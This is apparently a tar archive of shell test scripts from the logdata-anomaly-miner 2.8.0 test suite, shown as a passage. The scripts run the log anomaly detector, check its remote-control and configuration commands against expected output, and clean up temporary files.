HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:39 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:40 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:41 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:42 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" ::1 - - [18/Jul/2020:20:28:43 +0000] "GET / HTTP/1.1" 200 11012 "-" "bob" EOT FILE_SIZE=`stat --printf="%s" $LOGFILE 2> /dev/null` IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=0 while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 20 ]]; do sleep 1 IN=`cat $REP_PATH 2> /dev/null` IFS=',' read -ra ADDR <<< "$IN" CURRENT_SIZE=`echo ${ADDR[1]} | sed 's/ *$//g'` # trim all whitespaces CNTR=$((++CNTR)) done sleep 8 sudo pkill -x aminer.py sudo pkill -x aminer wait $PID awk '/^```$/ && ++n == 24, /^```$/ && n++ == 25' < $INPUT_FILE | sed '/^```/ d' > $OUT IN=$(cat $OUT) OUTPUT=$(tail -n 4 $OUT_AMINER) compareStrings "$IN" "$OUTPUT" "Failed Test in 12." exit_code=$((exit_code | $?)) # extract command, run it and compare results (13.) awk '/^```$/ && ++n == 35, /^```$/ && n++ == 36' < $INPUT_FILE | sed '/^```/ d' > $OUT CMD="$(sed -n '1p' < $OUT)" IFS='$' read -ra ADDR <<< "$CMD" CMD="${ADDR[1]}" OUTPUT=$($CMD) IN="$(sed -n '2p' < $OUT)" compareStrings "$IN" "$OUTPUT" "Failed Test in 13." exit_code=$((exit_code | $?)) sudo rm -r logdata-anomaly-miner.wiki sudo rm $CFG_PATH rm $OUT rm $LOG exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runJsonDemo.sh000077500000000000000000000017121500476301700236040ustar00rootroot00000000000000#!/bin/bash OUT=/tmp/out.txt AMINER_PERSISTENCE_PATH=/tmp/lib/aminer/* sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r $AMINER_PERSISTENCE_PATH 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm $OUT 2> /dev/null cp -r ./demo/aminerJsonInputDemo/json_logs /tmp/json_logs cp -r ./demo/aminerJsonInputDemo/windows_json_logs /tmp/windows_json_logs sudo ./demo/aminerJsonInputDemo/json-demo.sh $1 $OUT exit_code=$? OUTPUT=$(cat $OUT) if grep -Fq "VerboseUnparsedAtomHandler" $OUT; then exit_code=1 sed '/VerboseUnparsedAtomHandler/,$p' $OUT fi if grep -Fq "UnicodeDecodeError" $OUT || grep -Fq "Config-Error" $OUT || grep -Fq "Traceback" $OUT; then exit_code=1 sed '/UnicodeDecodeError/,$p' $OUT sed '/Config-Error/,$p' $OUT sed '/Traceback/,$p' $OUT fi sudo rm $OUT sudo rm -r /tmp/json_logs sudo rm -r /tmp/windows_json_logs exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runMccabe.sh000077500000000000000000000001311500476301700232320ustar00rootroot00000000000000#!/bin/bash python3 -m flake8 --max-complexity 30 /usr/lib/logdata-anomaly-miner exit 0 logdata-anomaly-miner-2.8.0/aecid-testsuite/runMypy.sh000077500000000000000000000017501500476301700230260ustar00rootroot00000000000000#!/bin/bash exit_code=0 mypy /usr/lib/logdata-anomaly-miner/aminer/analysis/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/events/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/input/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/parsing/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/util/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional exit_code=$(($exit_code + $?)) mypy /usr/lib/logdata-anomaly-miner/aminer/ --ignore-missing-imports --disable-error-code attr-defined --implicit-optional exit_code=$(($exit_code + $?)) exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runOfflineMode.sh000077500000000000000000000046061500476301700242620ustar00rootroot00000000000000#!/bin/bash sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo cp ./integration/offline_mode/data/* /tmp/ exit_code=0 #start aminer #if the aminer is stuck, Jenkins should fail it after a while. sudo aminer --config ./integration/offline_mode/offline_mode.yml --offline-mode --from-begin > /tmp/out.txt OUTPUT=$(cat /tmp/out.txt) read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: a1 ['/model/data'] a1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: b1 ['/model/data'] b1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: c1 ['/model/data'] c1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: z1 ['/model/data'] z1 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: a2 ['/model/data'] a2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: b2 ['/model/data'] b2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: c2 ['/model/data'] c2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi read -r -d '' VAR << END New path(s) detected NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines) /model/data: z2 ['/model/data'] z2 END if [[ "$OUTPUT" != *"$VAR"* ]]; then echo "$VAR" echo exit_code=1 fi sudo rm /tmp/file1.log sudo rm /tmp/file2.log exit $exit_code logdata-anomaly-miner-2.8.0/aecid-testsuite/runReleaseStringCheck.sh000077500000000000000000000022361500476301700255750ustar00rootroot00000000000000#!/bin/bash . ./testFunctions.sh METADATA_PATH=../source/root/usr/lib/logdata-anomaly-miner/metadata.py CONF_PATH=../docs/conf.py version=$(grep "__version__ =" $METADATA_PATH) version=$(sed 's/__version__ = //g' <<< $version) version=$(sed 's/"//g' <<< $version) release=$(grep "release =" $CONF_PATH) release=$(sed "s/release = //g" <<< $release) release=$(sed "s/'//g" <<< $release) if [[ "$version" == "" || "$release" == "" ]]; then exit 1 fi if [[ "$version" != "$release" ]]; then echo "Version $version not equal with $release." if [[ $# -eq 1 ]]; then if [[ "$1" != "-u" && "$1" != "--update" ]]; then echo "Unknown Parameter $1. Exiting.." exit 1 else compareVersionStrings "$version" "$release" res=$? if [[ $res -eq 1 ]]; then sed -i "s/release = '$release'/release = '$version'/g" $CONF_PATH echo "Updated version string in $CONF_PATH from $release to $version." elif [[ $res -eq 2 ]]; then sed -i "s/__version__ = \"$version\"/__version__ = \"$release\"/g" $METADATA_PATH echo "Updated version string in $METADATA_PATH from $version to $release." fi fi fi exit 1 fi logdata-anomaly-miner-2.8.0/aecid-testsuite/runRemoteControlTest.sh000077500000000000000000000630641500476301700255320ustar00rootroot00000000000000#!/bin/bash FILE=/tmp/demo-config.py CMD_PATH=/tmp/commands.txt sudo cp demo/aminerRemoteControl/demo-config.py $FILE sudo sed -i 's/StreamPrinterEventHandler(analysis_context)/StreamPrinterEventHandler(analysis_context, stream=open("\/tmp\/log.txt", "a"))/g' $FILE sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir -p /tmp/lib/aminer/log sudo chown -R aminer:aminer /tmp/lib 2> /dev/null sudo rm /tmp/syslog 2> /dev/null touch /tmp/syslog OUTPUT_FILE=/tmp/output.txt sudo aminer --config "$FILE" & > $OUTPUT_FILE for i in {1..60}; do grep "INFO aminer started." /tmp/lib/aminer/log/aminer.log > /dev/null 2>&1; if [[ $? == 0 ]]; then break; fi; sleep 1; done stdout=$(sudo aminerremotecontrol --exec-file $CMD_PATH) expected="File $CMD_PATH does not exist" if [[ "$stdout" != "$expected" ]]; then echo "$ERROR exec-file not exists." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi START_TIME=$(date +%s) PREFIX="Remote execution response: " NOT_FOUND_WARNINGS="WARNING: config_properties['Core.PersistencePeriod'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsLevel'] = not found in the old config file.\nWARNING: config_properties['Log.DebugLevel'] = not found in the old config file.\nWARNING: config_properties['Log.StatisticsPeriod'] = not found in the old config file.\n" ERROR="Error at:" exit_code=0 expected_list="" echo "print_config_property(analysis_context, 'Core.PersistenceDir')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistenceDir')") expected="$PREFIX'\"Core.PersistenceDir\": /tmp/lib/aminer'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR error printing 'Core.PersistenceDir'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_config_property(analysis_context, 'Core.PersistencePeriod')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_config_property(analysis_context, 'Core.PersistencePeriod')") expected="$PREFIX'\"Resource \\\\\"Core.PersistencePeriod\\\\\" could not be found.\"'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR error printing 'Core.PersistencePeriod'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # check if proper mail address validation is done. properties=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'") # only test 'MailAlerting.TargetAddress' to reduce runtime and expect 'MailAlerting.FromAddress' to work the same way. properties=("'MailAlerting.TargetAddress'") valid_addresses=("'test123@gmail.com'" "'root@localhost'" ) error_addresses=("'domain.user1@localhost'" "'root@notLocalhost'") for property in "${properties[@]}"; do for address in "${valid_addresses[@]}"; do echo "change_config_property(analysis_context, $property, $address)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $address)") expected="$PREFIX\"$property changed to $address successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $address." echo "Expected: $expected" echo "$stdout" echo exit_code=1 fi done for address in "${error_addresses[@]}"; do echo "change_config_property(analysis_context, $property, $address)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $address)") expected="$PREFIX'FAILURE: MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $address." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done done INTEGER_CONFIG_PROPERTIES=("'MailAlerting.AlertGraceTime'" "'MailAlerting.EventCollectTime'" "'MailAlerting.MinAlertGap'" "'MailAlerting.MaxAlertGap'" "'MailAlerting.MaxEventsPerMessage'" "'Core.PersistencePeriod'" "'Log.StatisticsLevel'" "'Log.DebugLevel'" "'Log.StatisticsPeriod'" "'Resources.MaxMemoryUsage'") STRING_CONFIG_PROPERTIES=("'MailAlerting.TargetAddress'" "'MailAlerting.FromAddress'" "'MailAlerting.SubjectPrefix'" "'LogPrefix'") for property in "${STRING_CONFIG_PROPERTIES[@]}"; do echo "change_config_property(analysis_context, $property, 123)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 123)") expected="$PREFIX\"FAILURE: the value of the property $property must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_config_property(analysis_context, $property, 'root@localhost')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 'root@localhost')") expected="$PREFIX\"$property changed to 'root@localhost' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to 'root@localhost'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done for property in "${INTEGER_CONFIG_PROPERTIES[@]}"; do echo "change_config_property(analysis_context, $property, '1')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, '1')") expected="$PREFIX\"FAILURE: the value of the property $property must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then echo "$ERROR changing $property wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_config_property(analysis_context, $property, 1)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, 1)") expected="$PREFIX\"$property changed to '1' successfully.\"" if [[ "$stdout" == "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: it is not safe to run the aminer with less than 32MB RAM.'" ]]; then echo "$ERROR changing $property to 1." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done properties=("'Log.StatisticsLevel'" "'Log.DebugLevel'") for property in "${properties[@]}"; do value=0 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=1 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=2 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX\"$property changed to '$value' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=-1 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. Allowed STAT_LEVEL values are 0, 1, 2.'" if [[ "$stdout" == "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi value=3 echo "change_config_property(analysis_context, $property, $value)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_config_property(analysis_context, $property, $value)") expected="$PREFIX'FAILURE: STAT_LEVEL $value is not allowed. Allowed STAT_LEVEL values are 0, 1, 2.'" if [[ "$stdout" == "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then expected_list="${expected_list}${stdout} " else expected_list="${expected_list}${expected} " fi if [[ "$stdout" != "$expected" && "$stdout" != "$PREFIX'FAILURE: DEBUG_LEVEL $value is not allowed. Allowed DEBUG_LEVEL values are 0, 1, 2.'" ]]; then echo "$ERROR changing $property to $value." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi done echo "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueCombo','NewMatchPathValueComboDetector')") expected="$PREFIX\"Component 'NewMatchPathValueCombo' renamed to 'NewMatchPathValueComboDetector' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames the 'NewMatchPathValueCombo' component to 'NewMatchPathValueComboDetector'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NewMatchPathValueComboDetector', 222)") expected="$PREFIX\"FAILURE: the parameters 'old_component_name' and 'new_component_name' must be of type str.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames the 'NewMatchPathValueComboDetector' wrong Type. (no string; integer value)" echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "rename_registered_analysis_component(analysis_context,'NonExistingDetector','NewMatchPathValueComboDetector')") expected="$PREFIX\"FAILURE: the component 'NonExistingDetector' does not exist.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR renames a non existing component to 'NewMatchPathValueComboDetector'." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', False)") expected="$PREFIX\"'NewMatchPathValueComboDetector.learn_mode' changed from False to False successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' to False." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "change_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'learn_mode', 'True')") expected="$PREFIX\"FAILURE: property 'NewMatchPathValueComboDetector.learn_mode' must be of type !\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR changes the 'learn_mode' of the 'NewMatchPathValueComboDetector' wrong Type." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'target_path_list')") expected="$PREFIX'\"NewMatchPathValueComboDetector.target_path_list\": [\"/model/IPAddresses/Username\", \"/model/IPAddresses/IP\"]'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR prints the current list of paths." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "print_attribute_of_registered_analysis_component(analysis_context, 'NewMatchPathValueComboDetector', 'other_path_list')") expected="$PREFIX\"FAILURE: the component 'NewMatchPathValueComboDetector' does not have an attribute named 'other_path_list'.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR prints not existing attribute." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.event_handler_list, learn_mode=True), 'NewMatchPathDet')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', NewMatchPathDetector(analysis_context.aminer_config, analysis_context.atomizer_factory.event_handler_list, learn_mode=True), 'NewMatchPathDet')") expected="$PREFIX\"Component 'NewMatchPathDet' added to 'AtomFilter' successfully.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR add a new NewMatchPathDetector to the config." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "add_handler_to_atom_filter_and_register_analysis_component(analysis_context, 'AtomFilter', 'StringDetector', 'StringDetector')") expected="$PREFIX\"FAILURE: 'component' must implement the AtomHandlerInterface!\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR add a wrong class to the config." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "save_current_config(analysis_context,'/tmp/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/tmp/config.py')") expected="${PREFIX}\"${NOT_FOUND_WARNINGS}Successfully saved the current config to /tmp/config.py.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to /tmp/config.py." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi sudo rm /tmp/config.py echo "save_current_config(analysis_context,'[/path/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'[/path/config.py')") expected="${PREFIX}'Exception: [/path/config.py is not a valid filename!'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to an invalid path." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "save_current_config(analysis_context,'/notExistingPath/config.py')" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "save_current_config(analysis_context,'/notExistingPath/config.py')") expected="${PREFIX}\"${NOT_FOUND_WARNINGS}FAILURE: file '/notExistingPath/config.py' could not be found or opened!\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR save the current config to an not existing directory path." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "persist_all()" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "persist_all()") expected="${PREFIX}'OK'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR persist_all." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # echo "create_backup(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "create_backup(analysis_context)") expected="${PREFIX}'Created backup " # expected_list="${expected_list}${expected} # " if [[ "$stdout" != "$expected"* ]]; then echo "$ERROR creating backup." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi # echo "list_backups(analysis_context)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "list_backups(analysis_context)") expected="${PREFIX}'\"backups\": [" # expected_list="${expected_list}${expected} # " if [[ "$stdout" != "$expected"* ]]; then echo "$ERROR listing backups." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi timestamp=$(date +%s) echo "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,('/model/path',1)),allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EnhancedNewValueCombo',($timestamp,('/model/path',1)),allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(s) /model/DailyCron/UName, /model/DailyCron/JobNumber with ($timestamp, ('/model/path', 1)).\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event EnhancedNewMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'MissingMatch',(' ','/model/DiskReport/Space'),allowlisting_data=-1)") expected="${PREFIX}\"Updated ' ' in '/model/DiskReport/Space' to new interval 2.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event MissingMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPath','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(s) /model/somepath in Analysis.NewMatchPathDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector',(b'value1',b'value2'),allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValueComboDetector',(b'value1',b'value2'),allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(s) /model/IPAddresses/Username, /model/IPAddresses/IP with (b'value1', b'value2').\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathValueCombo." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector',{'/model/type/path/id':1, '/model/type/syscall/id':1},allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchIdValueComboDetector',{'/model/type/path/id':1, '/model/type/syscall/id':1},allowlisting_data=None)") expected="${PREFIX}\"Allowlisted path(s) /model/type/path/id, /model/type/syscall/id with {'/model/type/path/id': 1, '/model/type/syscall/id': 1}.\"" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchIdValueComboDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path /model/somepath in Analysis.EventCorrelationDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "allowlist_event_in_component(analysis_context,'NewMatchPathValue',b'/model/somepath',allowlisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "allowlist_event_in_component(analysis_context,'NewMatchPathValue',b'/model/somepath',allowlisting_data=None)") expected="${PREFIX}'Allowlisted path(s) /model/DailyCron/Job Number, /model/IPAddresses/Username with /model/somepath.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR allowlist_event NewMatchPathValueDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)") expected="${PREFIX}'Blocklisted path /model/somepath in Analysis.EventCorrelationDetector.'" expected_list="${expected_list}${expected} " if [[ "$stdout" != "$expected" ]]; then echo "$ERROR blocklist_event EventCorrelationDetector." echo "$stdout" echo "Expected: $expected" echo exit_code=1 fi echo "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)" >> $CMD_PATH stdout=$(sudo aminerremotecontrol --exec "blocklist_event_in_component(analysis_context,'EventCorrelationDetector','/model/somepath',blocklisting_data=None)") expected="${PREFIX}'Blocklisted path /model/somepath 